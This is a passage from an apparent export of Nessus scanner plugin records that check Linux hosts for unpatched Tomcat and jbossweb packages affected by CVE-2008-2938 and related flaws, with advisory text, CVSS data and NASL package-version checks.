(C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"tomcat5-5.0.30-27.30\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"tomcat5-admin-webapps-5.0.30-27.30\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"tomcat5-webapps-5.0.30-27.30\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"tomcat5-5.0.30-27.30\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"tomcat5-admin-webapps-5.0.30-27.30\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"tomcat5-webapps-5.0.30-27.30\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:41:24", "description": "This update of tomcat fixes another directory traversal bug which occurs when allowLinking and UTF-8 are enabled. (CVE-2008-2938)", "cvss3": {}, "published": "2008-09-10T00:00:00", "type": "nessus", "title": "openSUSE 10 Security Update : tomcat5 (tomcat5-5542)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:tomcat5", "p-cpe:/a:novell:opensuse:tomcat5-admin-webapps", "p-cpe:/a:novell:opensuse:tomcat5-webapps", "cpe:/o:novell:opensuse:10.2"], "id": "SUSE_TOMCAT5-5542.NASL", "href": "https://www.tenable.com/plugins/nessus/34155", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update tomcat5-5542.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34155);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2938\");\n\n script_name(english:\"openSUSE 10 Security Update : tomcat5 (tomcat5-5542)\");\n script_summary(english:\"Check for the tomcat5-5542 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of tomcat fixes another directory traversal bug which\noccurs when allowLinking and UTF-8 are enabled. (CVE-2008-2938)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat5 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat5-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat5-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.2\", reference:\"tomcat5-5.0.30-65\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"tomcat5-admin-webapps-5.0.30-65\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"tomcat5-webapps-5.0.30-65\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:41:11", "description": "This update of tomcat fixes another directory traversal bug which occurs when allowLinking and UTF-8 are enabled. (CVE-2008-2938)", "cvss3": {}, "published": "2008-09-11T00:00:00", "type": "nessus", "title": "openSUSE 10 Security Update : tomcat55 (tomcat55-5547)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:tomcat55", "p-cpe:/a:novell:opensuse:tomcat55-admin-webapps", "p-cpe:/a:novell:opensuse:tomcat55-common-lib", "p-cpe:/a:novell:opensuse:tomcat55-jasper", "p-cpe:/a:novell:opensuse:tomcat55-jasper-javadoc", "p-cpe:/a:novell:opensuse:tomcat55-jsp-2_0-api", "p-cpe:/a:novell:opensuse:tomcat55-jsp-2_0-api-javadoc", "p-cpe:/a:novell:opensuse:tomcat55-server-lib", "p-cpe:/a:novell:opensuse:tomcat55-servlet-2_4-api", "p-cpe:/a:novell:opensuse:tomcat55-servlet-2_4-api-javadoc", "p-cpe:/a:novell:opensuse:tomcat55-webapps", "cpe:/o:novell:opensuse:10.3"], "id": "SUSE_TOMCAT55-5547.NASL", "href": "https://www.tenable.com/plugins/nessus/34168", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update tomcat55-5547.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34168);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2938\");\n\n script_name(english:\"openSUSE 10 Security Update : tomcat55 (tomcat55-5547)\");\n script_summary(english:\"Check for the tomcat55-5547 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of tomcat fixes another directory traversal bug which\noccurs when allowLinking and UTF-8 are enabled. (CVE-2008-2938)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat55 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat55-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat55-common-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat55-jasper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat55-jasper-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat55-jsp-2_0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat55-jsp-2_0-api-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat55-server-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat55-servlet-2_4-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat55-servlet-2_4-api-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat55-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"tomcat55-5.5.23-113.10\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"tomcat55-admin-webapps-5.5.23-113.10\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"tomcat55-common-lib-5.5.23-113.10\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"tomcat55-jasper-5.5.23-113.10\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"tomcat55-jasper-javadoc-5.5.23-113.10\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"tomcat55-jsp-2_0-api-5.5.23-113.10\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"tomcat55-jsp-2_0-api-javadoc-5.5.23-113.10\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"tomcat55-server-lib-5.5.23-113.10\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"tomcat55-servlet-2_4-api-5.5.23-113.10\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"tomcat55-servlet-2_4-api-javadoc-5.5.23-113.10\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"tomcat55-webapps-5.5.23-113.10\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:41:06", "description": "An updated jbossweb package that fixes various security issues is now available for JBoss Enterprise Application Platform (JBoss EAP) 4.2 and 4.3.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nJBoss Web Server (jbossweb) is an enterprise ready web server designed for medium and large applications, is based on Apache Tomcat, and is embedded into JBoss Application Server. It provides organizations with a single deployment platform for JavaServer Pages (JSP) and Java Servlet technologies, Microsoft(r) .NET, PHP, and CGI.\n\nA traversal vulnerability was discovered when using a RequestDispatcher in combination with a servlet or JSP. A remote attacker could utilize a specially crafted request parameter to access protected web resources. (CVE-2008-2370)\n\nAn additional traversal vulnerability was discovered when the 'allowLinking' and 'URIencoding' settings were activated. A remote attacker could use a UTF-8-encoded request to extend their privileges and obtain local files accessible to the jbossweb process.\n(CVE-2008-2938)\n\nUsers of jbossweb should upgrade to this updated package, which contains backported patches to resolve these issues.", "cvss3": {}, "published": "2013-01-24T00:00:00", "type": "nessus", "title": "RHEL 4 / 5 : jbossweb (RHSA-2008:0877)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1232", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jbossweb", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2008-0877.NASL", "href": "https://www.tenable.com/plugins/nessus/63868", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0877. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63868);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1232\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_bugtraq_id(30494, 30633);\n script_xref(name:\"RHSA\", value:\"2008:0877\");\n\n script_name(english:\"RHEL 4 / 5 : jbossweb (RHSA-2008:0877)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated jbossweb package that fixes various security issues is now\navailable for JBoss Enterprise Application Platform (JBoss EAP) 4.2\nand 4.3.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nJBoss Web Server (jbossweb) is an enterprise ready web server designed\nfor medium and large applications, is based on Apache Tomcat, and is\nembedded into JBoss Application Server. It provides organizations with\na single deployment platform for JavaServer Pages (JSP) and Java\nServlet technologies, Microsoft(r) .NET, PHP, and CGI.\n\nA traversal vulnerability was discovered when using a\nRequestDispatcher in combination with a servlet or JSP. A remote\nattacker could utilize a specially crafted request parameter to access\nprotected web resources. (CVE-2008-2370)\n\nAn additional traversal vulnerability was discovered when the\n'allowLinking' and 'URIencoding' settings were activated. A remote\nattacker could use a UTF-8-encoded request to extend their privileges\nand obtain local files accessible to the jbossweb process.\n(CVE-2008-2938)\n\nUsers of jbossweb should upgrade to this updated package, which\ncontains backported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-1232\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2938\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0877\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jbossweb package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22, 79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0877\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-2.0.0-5.CP07.0jpp.ep1.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-2.0.0-5.CP07.0jpp.ep1.1.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jbossweb\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:49:16", "description": "From Red Hat Security Advisory 2008:0648 :\n\nUpdated tomcat packages that fix several security issues are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nA cross-site scripting vulnerability was discovered in the HttpServletResponse.sendError() method. A remote attacker could inject arbitrary web script or HTML via forged HTTP headers. (CVE-2008-1232)\n\nAn additional cross-site scripting vulnerability was discovered in the host manager application. A remote attacker could inject arbitrary web script or HTML via the hostname parameter. (CVE-2008-1947)\n\nA traversal vulnerability was discovered when using a RequestDispatcher in combination with a servlet or JSP. A remote attacker could utilize a specially crafted request parameter to access protected web resources. (CVE-2008-2370)\n\nAn additional traversal vulnerability was discovered when the 'allowLinking' and 'URIencoding' settings were activated. A remote attacker could use a UTF-8-encoded request to extend their privileges and obtain local files accessible to the Tomcat process.\n(CVE-2008-2938)\n\nUsers of tomcat should upgrade to these updated packages, which contain backported patches to resolve these issues.", "cvss3": {}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : tomcat (ELSA-2008-0648)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:tomcat5", "p-cpe:/a:oracle:linux:tomcat5-admin-webapps", "p-cpe:/a:oracle:linux:tomcat5-common-lib", "p-cpe:/a:oracle:linux:tomcat5-jasper", "p-cpe:/a:oracle:linux:tomcat5-jasper-javadoc", "p-cpe:/a:oracle:linux:tomcat5-jsp-2.0-api", "p-cpe:/a:oracle:linux:tomcat5-jsp-2.0-api-javadoc", "p-cpe:/a:oracle:linux:tomcat5-server-lib", "p-cpe:/a:oracle:linux:tomcat5-servlet-2.4-api", "p-cpe:/a:oracle:linux:tomcat5-servlet-2.4-api-javadoc", "p-cpe:/a:oracle:linux:tomcat5-webapps", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2008-0648.NASL", "href": "https://www.tenable.com/plugins/nessus/67733", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0648 and \n# Oracle Linux Security Advisory ELSA-2008-0648 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67733);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_bugtraq_id(29502, 30494, 30496, 30633);\n script_xref(name:\"RHSA\", value:\"2008:0648\");\n\n script_name(english:\"Oracle Linux 5 : tomcat (ELSA-2008-0648)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0648 :\n\nUpdated tomcat packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nA cross-site scripting vulnerability was discovered in the\nHttpServletResponse.sendError() method. A remote attacker could inject\narbitrary web script or HTML via forged HTTP headers. (CVE-2008-1232)\n\nAn additional cross-site scripting vulnerability was discovered in the\nhost manager application. A remote attacker could inject arbitrary web\nscript or HTML via the hostname parameter. (CVE-2008-1947)\n\nA traversal vulnerability was discovered when using a\nRequestDispatcher in combination with a servlet or JSP. A remote\nattacker could utilize a specially crafted request parameter to access\nprotected web resources. (CVE-2008-2370)\n\nAn additional traversal vulnerability was discovered when the\n'allowLinking' and 'URIencoding' settings were activated. A remote\nattacker could use a UTF-8-encoded request to extend their privileges\nand obtain local files accessible to the Tomcat process.\n(CVE-2008-2938)\n\nUsers of tomcat should upgrade to these updated packages, which\ncontain backported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-August/000720.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22, 79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat5-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat5-common-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat5-jasper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat5-jasper-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat5-jsp-2.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat5-jsp-2.0-api-javadoc\");\n 